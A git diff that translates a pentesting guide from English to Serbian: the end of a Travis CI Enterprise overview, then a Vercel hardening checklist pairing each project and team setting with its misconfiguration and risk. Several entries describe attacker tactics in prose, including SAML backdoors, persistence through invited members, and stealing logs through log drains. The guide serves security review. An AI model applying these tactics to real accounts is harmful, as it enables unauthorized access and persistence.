+1. TCI **usluge** (ili TCI Core Services), odgovorne za integraciju sa sistemima za kontrolu verzija, autorizaciju gradnji, zakazivanje poslova gradnje, itd.
+2. TCI **Worker** i slike okruženja za gradnju (takođe nazvane OS slike).
 
-**TCI Core services require the following:**
+**TCI Core usluge zahtevaju sledeće:**
 
-1. A **PostgreSQL11** (or later) database.
-2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
-3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
+1. **PostgreSQL11** (ili noviji) bazu podataka.
+2. Infrastrukturu za implementaciju Kubernetes klastera; može se implementirati u klasteru servera ili na jednoj mašini ako je potrebno.
+3. U zavisnosti od vaše konfiguracije, možda ćete želeti da implementirate i konfigurišete neke od komponenti sami, npr., RabbitMQ - pogledajte [Postavljanje Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) za više detalja.
 
-**TCI Worker requires the following:**
+**TCI Worker zahteva sledeće:**
 
-1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
-2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
+1. Infrastrukturu gde se može implementirati docker slika koja sadrži **Worker i povezanu sliku za gradnju**.
+2. Povezivost sa određenim komponentama Travis CI Core Services - pogledajte [Postavljanje Workera](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) za više detalja.
 
-The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
+Količina implementiranih TCI Worker i slika okruženja za gradnju OS će odrediti ukupni kapacitet istovremenih operacija Travis CI Enterprise implementacije u vašoj infrastrukturi.
 
 ![](<../../images/image (199).png>)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md
index 16dc93da7..2964739b6 100644
--- a/src/pentesting-ci-cd/vercel-security.md
+++ b/src/pentesting-ci-cd/vercel-security.md
@@ -2,440 +2,436 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**.
+U Vercelu, **Tim** je kompletno **okruženje** koje pripada klijentu, a **projekat** je **aplikacija**.
 
-For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also).
+Za pregled učvršćivanja **Vercela**, potrebno je zatražiti korisnika sa **dozvolom za gledanje** ili barem **dozvolom za gledanje projekta** kako bi se proverili projekti (u slučaju da je potrebno proveriti samo projekte, a ne i konfiguraciju tima).
 
-## Project Settings
+## Podešavanja projekta
 
-### General
+### Opšte
 
-**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
+**Svrha:** Upravljanje osnovnim podešavanjima projekta kao što su naziv projekta, okvir i konfiguracije izgradnje.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Transfer**
-  - **Misconfiguration:** Allows to transfer the project to another team
-  - **Risk:** An attacker could steal the project
-- **Delete Project**
-  - **Misconfiguration:** Allows to delete the project 
-  - **Risk:** Delete the prject
+- **Prenos**
+- **Pogrešna konfiguracija:** Omogućava prenos projekta na drugi tim
+- **Rizik:** Napadač bi mogao ukrasti projekat
+- **Brisanje projekta**
+- **Pogrešna konfiguracija:** Omogućava brisanje projekta 
+- **Rizik:** Brisanje projekta
 
 ---
 
-### Domains
+### Domeni
 
-**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
+**Svrha:** Upravljanje prilagođenim domenima, DNS podešavanjima i SSL konfiguracijama.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **DNS Configuration Errors**
-  - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
-  - **Risk:** Domain hijacking, traffic interception, and phishing attacks.
-- **SSL/TLS Certificate Management**
-  - **Misconfiguration:** Using weak or expired SSL/TLS certificates.
-  - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
-- **DNSSEC Implementation**
-  - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
-  - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
-- **Environment used per domain**
-  - **Misconfiguration:** Change the environment used by the domain in production.
-  - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
+- **Greške u DNS konfiguraciji**
+- **Pogrešna konfiguracija:** Neispravni DNS zapisi (A, CNAME) koji upućuju na zlonamerne servere.
+- **Rizik:** Otmica domena, presretanje saobraćaja i phishing napadi.
+- **Upravljanje SSL/TLS sertifikatima**
+- **Pogrešna konfiguracija:** Korišćenje slabih ili istečenih SSL/TLS sertifikata.
+- **Rizik:** Ranljivost na napade tipa man-in-the-middle (MITM), kompromitovanje integriteta i poverljivosti podataka.
+- **Implementacija DNSSEC**
+- **Pogrešna konfiguracija:** Neaktiviranje DNSSEC ili pogrešna DNSSEC podešavanja.
+- **Rizik:** Povećana podložnost napadima lažiranja DNS-a i trovanja kešom.
+- **Okruženje korišćeno po domenu**
+- **Pogrešna konfiguracija:** Promena okruženja koje koristi domen u produkciji.
+- **Rizik:** Izlaganje potencijalnih tajni ili funkcionalnosti koje ne bi trebale biti dostupne u produkciji.
 
 ---
 
-### Environments
+### Okruženja
 
-**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
+**Svrha:** Definisanje različitih okruženja (Razvoj, Pregled, Proizvodnja) sa specifičnim podešavanjima i varijablama.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Environment Isolation**
-  - **Misconfiguration:** Sharing environment variables across environments.
-  - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
-- **Access to Sensitive Environments**
-  - **Misconfiguration:** Allowing broad access to production environments.
-  - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
+- **Izolacija okruženja**
+- **Pogrešna konfiguracija:** Deljenje varijabli okruženja između okruženja.
+- **Rizik:** Curjenje produkcijskih tajni u razvojna ili pregledna okruženja, povećavajući izloženost.
+- **Pristup osetljivim okruženjima**
+- **Pogrešna konfiguracija:** Omogućavanje širokog pristupa produkcijskim okruženjima.
+- **Rizik:** Neovlašćene promene ili pristup aktivnim aplikacijama, što može dovesti do potencijalnih prekida rada ili curenja podataka.
 
 ---
 
-### Environment Variables
+### Varijable okruženja
 
-**Purpose:** Manage environment-specific variables and secrets used by the application.
+**Svrha:** Upravljanje varijablama i tajnama specifičnim za okruženje koje koristi aplikacija.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Exposing Sensitive Variables**
-  - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
-  - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
-- **Sensitive disabled**
-  - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
-  - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
-- **Shared Environment Variables**
-  - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
-  - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Izlaganje osetljivih varijabli**
+- **Pogrešna konfiguracija:** Prefiksiranje osetljivih varijabli sa `NEXT_PUBLIC_`, čineći ih dostupnim na klijentskoj strani.
+- **Rizik:** Izlaganje API ključeva, kredencijala baze podataka ili drugih osetljivih podataka javnosti, što dovodi do curenja podataka.
+- **Osetljivo onemogućeno**
+- **Pogrešna konfiguracija:** Ako je onemogućeno (podrazumevano) moguće je pročitati vrednosti generisanih tajni.
+- **Rizik:** Povećana verovatnoća slučajnog izlaganja ili neovlašćenog pristupa osetljivim informacijama.
+- **Deljene varijable okruženja**
+- **Pogrešna konfiguracija:** Ovo su varijable okruženja postavljene na nivou tima i mogu takođe sadržati osetljive informacije.
+- **Rizik:** Povećana verovatnoća slučajnog izlaganja ili neovlašćenog pristupa osetljivim informacijama.
 
 ---
 
 ### Git
 
-**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
+**Svrha:** Konfigurišite integracije Git repozitorijuma, zaštitu grana i okidače za implementaciju.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Ignored Build Step (TODO)**
-  - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
-  - **Risk:** TBD
+- **Ignorisani korak izgradnje (TODO)**
+- **Pogrešna konfiguracija:** Čini se da ova opcija omogućava konfiguraciju bash skripte/komandi koje će se izvršiti kada se novi commit pošalje na Github, što bi moglo omogućiti RCE.
+- **Rizik:** TBD
 
 ---
 
-### Integrations
+### Integracije
 
-**Purpose:** Connect third-party services and tools to enhance project functionalities.
+**Svrha:** Povezivanje usluga i alata trećih strana za poboljšanje funkcionalnosti projekta.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Insecure Third-Party Integrations**
-  - **Misconfiguration:** Integrating with untrusted or insecure third-party services.
-  - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
-- **Over-Permissioned Integrations**
-  - **Misconfiguration:** Granting excessive permissions to integrated services.
-  - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
-- **Lack of Integration Monitoring**
-  - **Misconfiguration:** Failing to monitor and audit third-party integrations.
-  - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
+- **Neosigurane integracije trećih strana**
+- **Pogrešna konfiguracija:** Integracija sa nepouzdanim ili neosiguranim uslugama trećih strana.
+- **Rizik:** Uvođenje ranjivosti, curenje podataka ili zadnja vrata kroz kompromitovane integracije.
+- **Prekomerno ovlašćene integracije**
+- **Pogrešna konfiguracija:** Dodeljivanje prekomernih dozvola integrisanim uslugama.
+- **Rizik:** Neovlašćen pristup resursima projekta, manipulacija podacima ili prekidi usluga.
+- **Nedostatak praćenja integracija**
+- **Pogrešna konfiguracija:** Nepratiti i neauditovati integracije trećih strana.
+- **Rizik:** Odloženo otkrivanje kompromitovanih integracija, povećavajući potencijalni uticaj bezbednosnih povreda.
 
 ---
 
-### Deployment Protection
+### Zaštita implementacije
 
-**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
+**Svrha:** Osiguranje implementacija kroz različite mehanizme zaštite, kontrolišući ko može pristupiti i implementirati u vaša okruženja.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-**Vercel Authentication**
+**Vercel autentifikacija**
 
-- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
-- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
+- **Pogrešna konfiguracija:** Onemogućavanje autentifikacije ili neprovođenje provere članova tima.
+- **Rizik:** Neovlašćeni korisnici mogu pristupiti implementacijama, što dovodi do curenja podataka ili zloupotrebe aplikacija.
 
-**Protection Bypass for Automation**
+**Zaštita zaobilaženja za automatizaciju**
 
-- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
-- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
+- **Pogrešna konfiguracija:** Javna izloženost tajne zaobilaženja ili korišćenje slabih tajni.
+- **Rizik:** Napadači mogu zaobići zaštitu implementacije, pristupajući i manipulišući zaštićenim implementacijama.
 
-**Shareable Links**
+**Deljivi linkovi**
 
-- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
-- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
+- **Pogrešna konfiguracija:** Deljenje linkova bez razmišljanja ili neukidanje zastarelih linkova.
+- **Rizik:** Neovlašćen pristup zaštićenim implementacijama, zaobilazeći autentifikaciju i IP ograničenja.
 
 **OPTIONS Allowlist**
 
-- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
-- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
+- **Pogrešna konfiguracija:** Preširoko dozvoljavanje putanja ili osetljivih krajnjih tačaka.
+- **Rizik:** Napadači mogu iskoristiti nezaštićene putanje za izvođenje neovlašćenih radnji ili zaobilaženje bezbednosnih provera.
 
-**Password Protection**
+**Zaštita lozinkom**
 
-- **Misconfiguration:** Using weak passwords or sharing them insecurely.
-- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Pogrešna konfiguracija:** Korišćenje slabih lozinki ili njihovo nesigurno deljenje.
+- **Rizik:** Neovlašćen pristup implementacijama ako se lozinke pogode ili procure.
+- **Napomena:** Dostupno na **Pro** planu kao deo **Napredne zaštite implementacije** za dodatnih $150/mesečno.
 
-**Deployment Protection Exceptions**
+**Izuzeci zaštite implementacije**
 
-- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
-- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Pogrešna konfiguracija:** Nehotice dodavanje produkcijskih ili osetljivih domena na listu izuzetaka.
+- **Rizik:** Izlaganje kritičnih implementacija javnosti, što dovodi do curenja podataka ili neovlašćenog pristupa.
+- **Napomena:** Dostupno na **Pro** planu kao deo **Napredne zaštite implementacije** za dodatnih $150/mesečno.
 
-**Trusted IPs**
+**Poverljivi IP-ovi**
 
-- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
-- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
-- **Note:** Available on the **Enterprise** plan.
+- **Pogrešna konfiguracija:** Pogrešno određivanje IP adresa ili CIDR opsega.
+- **Rizik:** Legitimni korisnici mogu biti blokirani ili neovlašćeni IP-ovi mogu dobiti pristup.
+- **Napomena:** Dostupno na **Enterprise** planu.
 
 ---
 
-### Functions
+### Funkcije
 
-**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
+**Svrha:** Konfigurišite serverless funkcije, uključujući podešavanja vremena izvršavanja, alokaciju memorije i bezbednosne politike.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Nothing**
+- **Ništa**
 
 ---
 
-### Data Cache
+### Keš podataka
 
-**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
+**Svrha:** Upravljanje strategijama i podešavanjima keširanja za optimizaciju performansi i kontrolu skladištenja podataka.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Purge Cache**
-  - **Misconfiguration:** It allows to delete all the cache.
-  - **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
+- **Očisti keš**
+- **Pogrešna konfiguracija:** Omogućava brisanje celog keša.
+- **Rizik:** Neovlašćeni korisnici brišu keš, što može dovesti do potencijalnog DoS.
 
 ---
 
-### Cron Jobs
+### Cron poslovi
 
-**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
+**Svrha:** Zakazivanje automatizovanih zadataka i skripti da se izvršavaju u određenim intervalima.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Disable Cron Job**
-  - **Misconfiguration:** It allows to disable cron jobs declared inside the code
-  - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
+- **Onemogući Cron posao**
+- **Pogrešna konfiguracija:** Omogućava onemogućavanje cron poslova deklarisanih unutar koda
+- **Rizik:** Potencijalno prekidanje usluge (u zavisnosti od svrhe cron poslova)
 
 ---
 
 ### Log Drains
 
-**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
+**Svrha:** Konfigurišite spoljne usluge za logovanje kako biste zabeležili i čuvali logove aplikacije za praćenje i reviziju.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- Nothing (managed from teams settings)
+- Ništa (upravljano iz podešavanja timova)
 
 ---
 
-### Security
+### Bezbednost
 
-**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
+**Svrha:** Centralno mesto za različita podešavanja vezana za bezbednost koja utiču na pristup projektu, zaštitu izvora i još mnogo toga.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-**Build Logs and Source Protection**
+**Logovi izgradnje i zaštita izvora**
 
-- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
-- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
+- **Pogrešna konfiguracija:** Onemogućavanje zaštite ili izlaganje `/logs` i `/src` putanja javnosti.
+- **Rizik:** Neovlašćen pristup logovima izgradnje i izvoru koda, što dovodi do curenja informacija i potencijalne eksploatacije ranjivosti.
 
-**Git Fork Protection**
+**Zaštita Git forkova**
 
-- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
-- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
+- **Pogrešna konfiguracija:** Omogućavanje neovlašćenih pull zahteva bez odgovarajućih pregleda.
+- **Rizik:** Zlonamerni kod može biti spojen u kodnu bazu, uvodeći ranjivosti ili zadnja vrata.
 
-**Secure Backend Access with OIDC Federation**
+**Siguran pristup backend-u sa OIDC federacijom**
 
-- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
-- **Risk:** Unauthorized access to backend services through flawed authentication flows.
+- **Pogrešna konfiguracija:** Pogrešno postavljanje OIDC parametara ili korišćenje nesigurnih URL-ova izdavača.
+- **Rizik:** Neovlašćen pristup backend uslugama kroz neispravne tokove autentifikacije.
 
-**Deployment Retention Policy**
+**Politika zadržavanja implementacija**
 
-- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
-- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
+- **Pogrešna konfiguracija:** Postavljanje perioda zadržavanja prekratko (gubitak istorije implementacija) ili predugo (nepotrebno zadržavanje podataka).
+- **Rizik:** Nemogućnost vraćanja na prethodne verzije kada je to potrebno ili povećan rizik od izlaganja podataka iz starih implementacija.
 
-**Recently Deleted Deployments**
+**Nedavno obrisane implementacije**
 
-- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
-- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
+- **Pogrešna konfiguracija:** Nepratiti obrisane implementacije ili se oslanjati isključivo na automatska brisanja.
+- **Rizik:** Gubitak kritične istorije implementacija, otežavajući revizije i vraćanja.
 
 ---
 
-### Advanced
+### Napredno
 
-**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
+**Svrha:** Pristup dodatnim podešavanjima projekta za fino podešavanje konfiguracija i poboljšanje bezbednosti.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-**Directory Listing**
+**Lista direktorijuma**
 
-- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
-- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
+- **Pogrešna konfiguracija:** Omogućavanje liste direktorijuma omogućava korisnicima da vide sadržaj direktorijuma bez datoteke indeksa.
+- **Rizik:** Izlaganje osetljivih datoteka, strukture aplikacije i potencijalnih ulaznih tačaka za napade.
 
 ---
 
-## Project Firewall
+## Firewall projekta
 
 ### Firewall
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-**Enable Attack Challenge Mode**
+**Omogući izazov napada**
 
-- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
-- **Risk:** Potential user experience problems.
+- **Pogrešna konfiguracija:** Omogućavanje ovoga poboljšava odbranu web aplikacije protiv DoS, ali na račun upotrebljivosti
+- **Rizik:** Potencijalni problemi sa korisničkim iskustvom.
 
-### Custom Rules & IP Blocking
+### Prilagođena pravila i blokiranje IP-a
 
-- **Misconfiguration:** Allows to unblock/block traffic
-- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
+- **Pogrešna konfiguracija:** Omogućava otključavanje/blokiranje saobraćaja
+- **Rizik:** Potencijalni DoS omogućavajući zlonameran saobraćaj ili blokirajući benigni saobraćaj
 
 ---
 
-## Project Deployment
+## Implementacija projekta
 
-### Source
+### Izvor
 
-- **Misconfiguration:** Allows access to read the complete source code of the application
-- **Risk:** Potential exposure of sensitive information
+- **Pogrešna konfiguracija:** Omogućava pristup za čitanje kompletnog izvornog koda aplikacije
+- **Rizik:** Potencijalno izlaganje osetljivih informacija
 
-### Skew Protection
+### Zaštita od pomeranja
 
-- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
-- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
+- **Pogrešna konfiguracija:** Ova zaštita osigurava da klijentska i serverska aplikacija uvek koriste istu verziju kako ne bi došlo do desinkronizacije kada klijent koristi drugačiju verziju od servera i stoga se ne razumeju.
+- **Rizik:** Onemogućavanje ovoga (ako je omogućeno) moglo bi izazvati DoS probleme u novim implementacijama u budućnosti
 
 ---
 
-## Team Settings
+## Podešavanja tima
 
-### General
+### Opšte
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Transfer**
-  - **Misconfiguration:** Allows to transfer all the projects to another team
-  - **Risk:** An attacker could steal the projects
-- **Delete Project**
-  - **Misconfiguration:** Allows to delete the team with all the projects 
-  - **Risk:** Delete the projects
+- **Prenos**
+- **Pogrešna konfiguracija:** Omogućava prenos svih projekata na drugi tim
+- **Rizik:** Napadač bi mogao ukrasti projekte
+- **Brisanje projekta**
+- **Pogrešna konfiguracija:** Omogućava brisanje tima sa svim projektima 
+- **Rizik:** Brisanje projekata
 
 ---
 
-### Billing
+### Fakturisanje
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Speed Insights Cost Limit**
-  - **Misconfiguration:** An attacker could increase this number
-  - **Risk:** Increased costs
+- **Limit troškova Speed Insights**
+- **Pogrešna konfiguracija:** Napadač bi mogao povećati ovaj broj
+- **Rizik:** Povećani troškovi
 
 ---
 
-### Members
+### Članovi
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Add members**
-  - **Misconfiguration:** An attacker could maintain persitence inviting an account he control
-  - **Risk:** Attacker persistence
-- **Roles**
-  - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
-  - **Risk**: Increate the exposure of the Vercel Team
+- **Dodaj članove**
+- **Pogrešna konfiguracija:** Napadač bi mogao održati postojanost pozivajući nalog koji kontroliše
+- **Rizik:** Postojanost napadača
+- **Uloge**
+- **Pogrešna konfiguracija:** Dodeljivanje previše dozvola ljudima kojima to nije potrebno povećava rizik od konfiguracije Vercela. Proverite sve moguće uloge na [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
+- **Rizik**: Povećava izloženost Vercel tima
 
 ---
 
-### Access Groups
+### Grupe pristupa
 
-An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
+**Grupa pristupa** u Vercelu je kolekcija projekata i članova tima sa unapred definisanim dodelama uloga, omogućavajući centralizovano i pojednostavljeno upravljanje pristupom kroz više projekata.
 
-**Potential Misconfigurations:**
+**Potencijalne pogrešne konfiguracije:**
 
-- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
-- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
-- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
-- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
-- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
+- **Prekomerno ovlašćivanje članova:** Dodeljivanje uloga sa više dozvola nego što je potrebno, što dovodi do neovlašćenog pristupa ili radnji.
+- **Pogrešne dodela uloga:** Pogrešno dodeljivanje uloga koje se ne poklapaju sa odgovornostima članova tima, uzrokujući eskalaciju privilegija.
+- **Nedostatak segregacije projekata:** Neodvajanje osetljivih projekata, omogućavajući širi pristup nego što je planirano.
+- **Nedovoljno upravljanje grupama:** Nepravilno pregledanje ili ažuriranje grupa pristupa, što rezultira zastarelim ili neprimerenim dozvolama pristupa.
+- **Nepodudarne definicije uloga:** Korišćenje nepodudarnih ili nejasnih definicija uloga kroz različite grupe pristupa, što dovodi do konfuzije i bezbednosnih praznina.
 
 ---
 
 ### Log Drains
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Log Drains to third parties:**
-  - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
-  - **Risk:** Partial persistence
+- **Log Drains ka trećim stranama:**
+- **Pogrešna konfiguracija:** Napadač bi mogao konfigurisati Log Drain da ukrade logove
+- **Rizik:** Delimična postojanost
 
 ---
 
-### Security & Privacy
+### Bezbednost i privatnost
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
-  - **Misconfiguration:** 
-    - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
-    - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
-  - **Risks:**
-    - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
-      - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
-- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
-  - **Misconfiguration:** Not adding critical Git scopes to the protected list.
-- **Risks:**
-  - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
-  - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
-- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
-  - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
-  - **Risks:**
-    - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
-      - **Data Breach:** Sensitive information like API keys and credentials could be leaked.
-- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
-  - **Misconfiguration:**\
-    Granting access to audit logs to unauthorized team members.
-  - **Risks:**
-    - **Privacy Violations:** Exposure of sensitive user activities and data.
-      - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
-- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
-  - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
-  - **Risk:** Maintain persistence
-- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
-  - **Misconfiguration:** Leaving IP address visibility enabled without necessity.
-  - **Risks:**
-    - **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
-    - **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
-- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
-  - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
-  - **Risks:**
-    - **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
-    - **Operational Disruptions:** Loss of service availability for certain regions or clients.
+- **Domen e-pošte tima:** Kada je konfigurisano, ovo podešavanje automatski poziva Vercel lične naloge sa adresama e-pošte koje se završavaju na specificiranom domenu (npr. `mydomain.com`) da se pridruže vašem timu prilikom registracije i na kontrolnoj tabli.
+- **Pogrešna konfiguracija:** 
+- Određivanje pogrešnog domena e-pošte ili pogrešno napisani domen u podešavanju domena e-pošte tima.
+- Korišćenje uobičajenog domena e-pošte (npr. `gmail.com`, `hotmail.com`) umesto domena specifičnog za kompaniju.
+- **Rizici:**
+- **Neovlašćen pristup:** Korisnici sa adresama e-pošte iz neplaniranih domena mogu primiti pozivnice da se pridruže vašem timu.
+- **Izlaganje podataka:** Potencijalno izlaganje osetljivih informacija o projektu neovlašćenim osobama.
+- **Zaštićeni Git opsezi:** Omogućava vam da dodate do 5 Git opsega vašem timu kako biste sprečili druge Vercel timove da implementiraju repozitorijume iz zaštićenog opsega. Više timova može odrediti isti opseg, omogućavajući pristup obema timovima.
+- **Pogrešna konfiguracija:** Ne dodavanje kritičnih Git opsega na zaštićenu listu.
+- **Rizici:**
+- **Neovlašćene implementacije:** Drugi timovi mogu implementirati repozitorijume iz Git opsega vaše organizacije bez autorizacije.
+- **Izlaganje intelektualne svojine:** Proprietarni kod bi mogao biti implementiran i dostupan izvan vašeg tima.
+- **Politike varijabli okruženja:** Sprovodi politike za kreiranje i uređivanje varijabli okruženja tima. Konkretno, možete sprovoditi da se sve varijable okruženja kreiraju kao **Osetljive varijable okruženja**, koje može dekriptovati samo Vercelov sistem implementacije.
+- **Pogrešna konfiguracija:** Održavanje onemogućavanja osetljivih varijabli okruženja.
+- **Rizici:**
+- **Izlaganje tajni:** Varijable okruženja mogu biti pregledane ili uređene od strane neovlašćenih članova tima.
+- **Curanje podataka:** Osetljive informacije kao što su API ključevi i kredencijali mogli bi procureti.
